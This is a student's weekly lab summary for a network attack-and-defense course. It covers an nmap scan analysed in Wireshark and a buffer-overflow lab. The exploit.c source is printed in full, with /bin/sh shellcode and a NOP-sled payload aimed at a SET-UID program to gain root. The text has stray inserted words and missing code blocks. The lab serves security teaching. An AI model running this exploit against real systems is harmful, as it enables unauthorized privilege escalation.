《網絡攻擊與防範》第十週學習總結
20169308 2016-2017-2 《網絡攻擊與防範》第10周學習總結
本週主要完成了兩個實驗:NMap+Wireshark和緩衝區溢出漏洞實驗linux
NMap+Wireshark
實驗準備
攻擊方:192.168.1.22
防守方:192.168.1.101
採起橋接模式將兩臺虛擬機相連並ping通shell
實驗內容
1.攻擊方用nmap掃描
bash
2.防守方用tcpdump抓包
網絡
3.防守方用wireshark分析所抓取的數據包
app
由抓取的數據包能夠看出,抓取了大量tcp包,而且是針對不一樣端口,攻擊方正在進行tcp端口掃描。tcp
緩衝區溢出漏洞實驗
實驗簡介
緩衝區溢出是指程序試圖向緩衝區寫入超出預分配固定長度數據的狀況。這一漏洞能夠被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片斷。這一漏洞的出現是因爲數據緩衝器和返回地址的暫時關閉,溢出會引發返回地址被重寫。學習
實驗準備
實驗樓提供的是64位Ubuntu linux,而本次實驗爲了方便觀察彙編語句,咱們須要在32位環境下做操做,所以實驗以前須要作一些準備。
一、輸入命令安裝一些用於編譯32位C程序的東西:設計
sudo apt-get update sudo apt-get install lib32z1 libc6-dev-i386 sudo apt-get install lib32readline-gplv2-dev
二、輸入命令linux32進入32位linux環境
輸入/bin/bash使用bash:
3d
實驗步驟
一、初始設置
關閉地址空間隨機化來隨機堆(heap)和棧(stack)的初始地址,猜想準確的內存地址
code
使用另外一個shell程序(zsh)代替/bin/bash
二、shellcode
通常狀況下,緩衝區溢出會形成程序崩潰,在程序中,溢出的數據覆蓋了返回地址。而若是覆蓋返回地址的數據是另外一個地址,那麼程序就會跳轉到該地址,若是該地址存放的是一段精心設計的代碼用於實現其餘功能,這段代碼就是shellcode。
三、 漏洞程序
把如下代碼保存爲stack.c文件,保存到 /tmp 目錄下。代碼以下:
編譯該程序,並設置SET-UID。命令以下:
GCC編譯器有一種棧保護機制來阻止緩衝區溢出,因此咱們在編譯代碼時須要用 –fno-stack-protector 關閉這種機制。
而-z execstack 用於容許執行棧。
四、攻擊程序
咱們的目的是攻擊剛纔的漏洞程序,並經過攻擊得到root權限。
把如下代碼保存爲「exploit.c」文件,保存到 /tmp 目錄下。代碼以下:
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" //xorl %eax,%eax
"\x50" //pushl %eax
"\x68""//sh" //pushl $0x68732f2f
"\x68""/bin" //pushl $0x6e69622f
"\x89\xe3" //movl %esp,%ebx
"\x50" //pushl %eax
"\x53" //pushl %ebx
"\x89\xe1" //movl %esp,%ecx
"\x99" //cdq
"\xb0\x0b" //movb $0x0b,%al
"\xcd\x80" //int $0x80
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");
strcpy(buffer+100,shellcode);
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
獲得shellcode在內存中的地址:
shellcode地址爲 0xffffd020 + 100 = 0xffffd084
編譯exploit.c程序
五、攻擊結果
先運行攻擊程序exploit,再運行漏洞程序stack,觀察結果:
經過攻擊,得到了root權限
學習進度條
完成NMap+Wireshark實驗
完成緩衝區溢出漏洞實踐
參考資料
- 1. 《網絡攻擊與防範》第十一週學習總結
- 2. 20159318 《網絡攻擊與防範》第5周學習總結
- 3. 《網絡攻擊與防範》第四周學習總結
- 4. 《網絡攻擊與防範》第二週學習總結
- 5. 20159313網絡攻擊與防範第五週學習總結
- 6. 《網絡攻擊與防範》第七週學習總結
- 7. 《網絡攻擊與防範》第八週學習總結
- 8. 20159313網絡攻擊與防範第九周學習總結
- 9. 20159302《網絡攻擊與防範》第六週學習總結
- 10. 《網絡攻擊與防範》第五週學習總結
- 更多相關文章...
- • XML 總結 下一步學習什麼呢? - XML 教程
- • 您已經學習了 XML Schema,下一步學習什麼呢? - XML Schema 教程
- • Tomcat學習筆記(史上最全tomcat學習筆記)
- • 適用於PHP初學者的學習線路和建議
-
每一个你不满意的现在,都有一个你没有努力的曾经。